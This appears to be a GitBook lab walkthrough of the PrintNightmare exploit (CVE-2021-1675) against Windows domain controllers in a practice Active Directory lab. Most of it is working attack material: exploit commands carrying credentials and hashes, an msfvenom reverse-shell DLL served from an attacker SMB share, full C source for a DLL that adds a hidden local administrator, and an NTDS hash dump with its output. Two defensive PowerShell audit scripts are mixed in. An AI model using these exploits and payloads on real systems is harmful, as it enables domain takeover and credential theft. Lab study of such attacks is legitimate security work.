# Exploit

### Exploit on vulnerable Windows Server 2019 (Bronx) <a href="#exploit-on-vulnerable-windows-server-2019-winterfell" id="exploit-on-vulnerable-windows-server-2019-winterfell"></a>

* Now try the same exploit against a vulnerable Windows Server 2019 host:

```
python3 CVE-2021-1675.py north.newyork.local/elena.lopez:'princesa1'@north.newyork.local '\\192.168.56.31\ATTACKERSHARE\nightmare.dll'
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2F78MCyafxlehZ4mghylPp%2Fimage.png?alt=media&#x26;token=ab56c4f0-6e00-4344-8ecb-7000663ad279" alt=""><figcaption></figcaption></figure>

To exploit PrintNightmare we first check whether the Print Spooler service is running on the targets.

### Check that the spooler is active

```
crackmapexec smb 192.168.56.10-23 -M spooler
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FdZ2cVQxhuc63idwqlX8v%2Fimage.png?alt=media&#x26;token=b5ec5728-3361-4dbe-86f4-24398f2de7a9" alt=""><figcaption></figcaption></figure>

```
rpcdump.py @192.168.56.10 | egrep 'MS-RPRN|MS-PAR'
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2Fod1pL1JK353EAnTtACIb%2Fimage.png?alt=media&#x26;token=b8d469d6-ded1-4285-aab1-86739412c21f" alt=""><figcaption></figcaption></figure>
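The same exposure can be audited from the defender's side on the host itself. The following PowerShell script is an added example and not part of the original page: it reports whether the Print Spooler is running and whether the Point and Print hardening values from Microsoft's PrintNightmare guidance (KB5005652) are set; the registry path and value names are the documented ones, the wording of the findings is mine.

```powershell
# Added example (not from the page): read-only audit of a host's Print Spooler
# exposure. Run in an elevated PowerShell on the server being checked.

$findings = @()

# 1. Is the spooler running at all? A domain controller or member server that
#    does not share printers has no reason to run it.
$svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
if ($null -eq $svc) {
    $findings += 'Spooler service not present'
} elseif ($svc.Status -eq 'Running') {
    $findings += "Spooler is RUNNING (StartType=$($svc.StartType)); disable it where printing is not needed"
} else {
    $findings += "Spooler is $($svc.Status) (StartType=$($svc.StartType))"
}

# 2. Point and Print policy. RestrictDriverInstallationToAdministrators=1 is
#    the safe value; the two prompt-suppression values should be 0 or absent.
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$pp  = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue

$restrict = if ($pp) { $pp.RestrictDriverInstallationToAdministrators } else { $null }
if ($restrict -ne 1) {
    $findings += 'RestrictDriverInstallationToAdministrators is not 1 (non-admins may install printer drivers)'
}
foreach ($name in 'NoWarningNoElevationOnInstall', 'UpdatePromptSettings') {
    $val = if ($pp) { $pp.$name } else { $null }   # dynamic property lookup
    if ($null -ne $val -and $val -ne 0) {
        $findings += "$name=$val suppresses Point and Print warning/elevation prompts"
    }
}

# 3. Does this host actually share printers? If not, stopping and disabling
#    the service removes the attack surface entirely.
$shared = Get-Printer -ErrorAction SilentlyContinue | Where-Object { $_.Shared }
if (-not $shared) {
    $findings += 'No shared printers on this host'
}

$findings | ForEach-Object { Write-Output "[Spooler audit] $_" }
```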

```
sudo smbserver.py -smb2support "smb" /home/jefe/smb
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FXbK33zuddTMmLvZecloT%2Fimage.png?alt=media&#x26;token=ba5bbf10-9f0b-4dfe-b6b8-79d4015735cc" alt=""><figcaption></figcaption></figure>

### Create a reverse shell DLL and place it in the SMB share directory

```
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.56.31 LPORT=4444 -o /home/jefe/smb/remote.dll
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FdwC40Y4TEElLnFyQ17iK%2Fimage.png?alt=media&#x26;token=8cf30b44-2047-4833-8f06-2caba5706c18" alt=""><figcaption></figcaption></figure>

### Set up the listener

```
msfconsole
use multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.56.31
set lport 4444
run
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2Fx0yvMpxwLScSHZzVmaRA%2Fimage.png?alt=media&#x26;token=76bb0ab3-0de5-482f-bdf7-015ab8e8c82a" alt=""><figcaption></figcaption></figure>

```
python3 CVE-2021-1675.py maryland.local/teresa.perez@baltimore.maryland.local -hashes 00000000000000000000000000000000:4d737ec9ecf0b9955a161773cfed9611 '\\192.168.56.31\smb\pnightmare2.dll'
```

### No shell: it gets caught by Defender

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FVGakiEURMjLsBxivojW6%2Fimage.png?alt=media&#x26;token=1933be98-7450-4c46-9c37-2c7e6ce19cc4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2Fj71jtDT4he03KZYmHM2e%2Fimage.png?alt=media&#x26;token=c7ae5cf0-c961-4edd-9417-a6e8581ffa96" alt=""><figcaption></figcaption></figure>

### Let's craft a new DLL

* Let's replace the payload with different code (source: <https://github.com/newsoft/adduser>).
* Good to know: after a few failed attempts Defender stops the Spooler service, and the exploit will not work again until someone restarts the server or the Spooler service.

```
/*
 * ADDUSER.C: creating a Windows user programmatically.
 */

#define UNICODE
#define _UNICODE

#include <windows.h>
#include <stdio.h>      // wprintf, which _tprintf expands to under UNICODE
#include <string.h>
#include <lmaccess.h>
#include <lmerr.h>
#include <tchar.h>


DWORD CreateAdminUserInternal(void)
{
    NET_API_STATUS rc;
    BOOL b;
    DWORD dw;

    USER_INFO_1 ud;
    LOCALGROUP_MEMBERS_INFO_0 gd;
    SID_NAME_USE snu;

    DWORD cbSid = 256;    // 256 bytes should be enough for everybody :)
    BYTE Sid[256];

    DWORD cbDomain = 256 / sizeof(TCHAR);
    TCHAR Domain[256];

    // Create user
    memset(&ud, 0, sizeof(ud));

    ud.usri1_name        = _T("yournightmare");                // username
    ud.usri1_password    = _T("Jusbrowsing123!");             // password
    ud.usri1_priv        = USER_PRIV_USER;                   // cannot set USER_PRIV_ADMIN on creation
    ud.usri1_flags       = UF_SCRIPT | UF_NORMAL_ACCOUNT;    // must be set
    ud.usri1_script_path = NULL;

    rc = NetUserAdd(
        NULL,            // local server
        1,                // information level
        (LPBYTE)&ud,
        NULL            // error value
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetUserAdd FAIL %d 0x%08x\r\n"), rc, rc);
        return rc;
    }

    _tprintf(_T("NetUserAdd OK\r\n"));

    // Get user SID
    b = LookupAccountName(
        NULL,            // local server
        ud.usri1_name,   // account name
        Sid,             // SID
        &cbSid,          // SID size
        Domain,          // Domain
        &cbDomain,       // Domain size
        &snu             // SID_NAME_USE (enum)
    );

    if (!b) {
        dw = GetLastError();
        _tprintf(_T("LookupAccountName FAIL %d 0x%08x\r\n"), dw, dw);
        return dw;
    }

    // Add user to "Administrators" local group
    memset(&gd, 0, sizeof(gd));

    gd.lgrmi0_sid = (PSID)Sid;

    rc = NetLocalGroupAddMembers(
        NULL,                    // local server
        _T("Administrators"),
        0,                        // information level
        (LPBYTE)&gd,
        1                        // only one entry
    );

    if (rc != NERR_Success) {
        _tprintf(_T("NetLocalGroupAddMembers FAIL %d 0x%08x\r\n"), rc, rc);
        return rc;
    }

    return 0;
}

//
// DLL entry point.
//

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Runs as soon as the DLL is loaded into a process
        CreateAdminUserInternal();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// RUNDLL32 entry point
#ifdef __cplusplus
extern "C" {
#endif

__declspec(dllexport) void __stdcall CreateAdminUser(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    CreateAdminUserInternal();
}

#ifdef __cplusplus
}
#endif

// Command-line entry point.
int main()
{
    return CreateAdminUserInternal();
}
```

* With this payload Defender does not flag the DLL, and our user is created and added to the local Administrators group.

### Compile

```
sudo apt-get install gcc-mingw-w64
wget https://raw.githubusercontent.com/newsoft/adduser/master/adduser.c
```

```
x86_64-w64-mingw32-gcc -shared -o pnightmare2.dll adduser.c -lnetapi32
```

* Relaunch the exploit:

```
python3 CVE-2021-1675.py maryland.local/teresa.perez@baltimore.maryland.local -hashes 00000000000000000000000000000000:4d737ec9ecf0b9955a161773cfed9611 '\\192.168.56.31\smb\yournightmare.dll'
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FTYTuxDFXsgDJiZCn35yx%2Fimage.png?alt=media&#x26;token=68cc2e96-0ab2-4b17-9f59-05341792b9c0" alt=""><figcaption></figcaption></figure>

### dumpy dumpy dumpy love love

```
crackmapexec smb baltimore.maryland.local -u yournightmare -p 'Jusbrowsing123!' --ntds
SMB         maryland.local  445    BALTIMORE        [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BALTIMORE) (domain:maryland.local) (signing:True) (SMBv1:True)
SMB         maryland.local  445    BALTIMORE        [+] maryland.local\yournightmare:Jusbrowsing123! (Pwn3d!)
SMB         maryland.local  445    BALTIMORE        [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         maryland.local  445    BALTIMORE        Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
SMB         maryland.local  445    BALTIMORE        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         maryland.local  445    BALTIMORE        krbtgt:502:aad3b435b51404eeaad3b435b51404ee:10f39f5a270977c56ac002b2c9cd660f:::
SMB         maryland.local  445    BALTIMORE        DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         maryland.local  445    BALTIMORE        vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB         maryland.local  445    BALTIMORE        carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:e205909d5d55a6d75365f15defbf27fb:::
SMB         maryland.local  445    BALTIMORE        marisol.Pedrosa:1111:aad3b435b51404eeaad3b435b51404ee:fd208d19680104ddb8e3d90962c0334e:::
SMB         maryland.local  445    BALTIMORE        joaquin.Pereida:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
SMB         maryland.local  445    BALTIMORE        teresa.Perez:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
SMB         maryland.local  445    BALTIMORE        sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB         maryland.local  445    BALTIMORE        pnightmare2:1115:aad3b435b51404eeaad3b435b51404ee:c103cafa49983dbcf3d8a1c951f46347:::
SMB         maryland.local  445    BALTIMORE        yournightmare:1116:aad3b435b51404eeaad3b435b51404ee:7b82840d460325f21d39ffdb471536f9:::
SMB         maryland.local  445    BALTIMORE        BALTIMORE$:1001:aad3b435b51404eeaad3b435b51404ee:0067621d2cb3ac05314b36ee408c7e51:::
SMB         maryland.local  445    BALTIMORE        SALISBURY$:1104:aad3b435b51404eeaad3b435b51404ee:da0edcfd9de34981b3bad4979882ec22:::
SMB         maryland.local  445    BALTIMORE        newyork$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
SMB         maryland.local  445    BALTIMORE        [+] Dumped 15 NTDS hashes to /home/jefe/.cme/logs/BALTIMORE_maryland.local_2023-03-08_223947.ntds of which 12 were added to the database
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FNiYc70JbCpnCvSvjhQAs%2Fimage.png?alt=media&#x26;token=02656c23-4c9d-44db-8137-d4f4fbd2b117" alt=""><figcaption></figcaption></figure>

#### cleanup <a href="#cleanup" id="cleanup"></a>

```
xfreerdp /u:yournightmare /p:Jusbrowsing123! /v:192.168.56.12 /size:80%  /cert-ignore
```

* After exploitation your DLLs can be found in: `C:\Windows\System32\spool\drivers\x64\3`

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FBVD5Y9fX37qI0GnSJFht%2Fimage.png?alt=media&#x26;token=6f165711-d24e-48bd-b0bf-0c13e8fd99a4" alt=""><figcaption></figcaption></figure>

* And also in: `C:\Windows\System32\spool\drivers\x64\3\Old\{id}\`

<figure><img src="https://mayfly277.github.io/assets/blog/GOAD/traces_old.png" alt=""><figcaption></figcaption></figure>
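Those same two locations are where an incident responder looks first. The following PowerShell script is an added example, not from the page or the adduser project: it walks the x64 driver store named above (including the `Old\{id}\` copies), flags DLLs that are unsigned or recently written, and pulls the PrintService operational events that record driver additions. The `$Days` window is a constructed default.

```powershell
# Added example (not from the page): read-only triage of the x64 print driver
# store for dropped DLLs. Run in an elevated PowerShell on the suspected host.
param([int]$Days = 7)   # constructed default: how far back "recent" reaches

$store  = 'C:\Windows\System32\spool\drivers\x64\3'
$cutoff = (Get-Date).AddDays(-$Days)

# -Recurse covers both the live directory and the Old\{id}\ copies the
# spooler keeps after a driver update.
Get-ChildItem -Path $store -Recurse -Filter '*.dll' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.FullName
        [pscustomobject]@{
            Path      = $_.FullName
            Written   = $_.LastWriteTime
            Signature = $sig.Status                 # Valid, NotSigned, HashMismatch, ...
            Signer    = $sig.SignerCertificate.Subject
            # Legitimate driver DLLs are signed; an unsigned or freshly written
            # file in this directory is worth a closer look.
            Suspect   = ($sig.Status -ne 'Valid') -or ($_.LastWriteTime -gt $cutoff)
        }
    } |
    Where-Object Suspect |
    Sort-Object Written -Descending |
    Format-Table -AutoSize Path, Written, Signature, Signer

# Event ID 316 records a driver install with its file list; ID 808 records a
# plug-in module the spooler failed to load. The log is disabled by default,
# so it may be empty unless it was turned on beforehand with:
#   wevtutil sl Microsoft-Windows-PrintService/Operational /e:true
Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PrintService/Operational'
    Id        = 316, 808
    StartTime = $cutoff
} -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message |
    Format-List
```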

* Don’t forget to clean up ;)

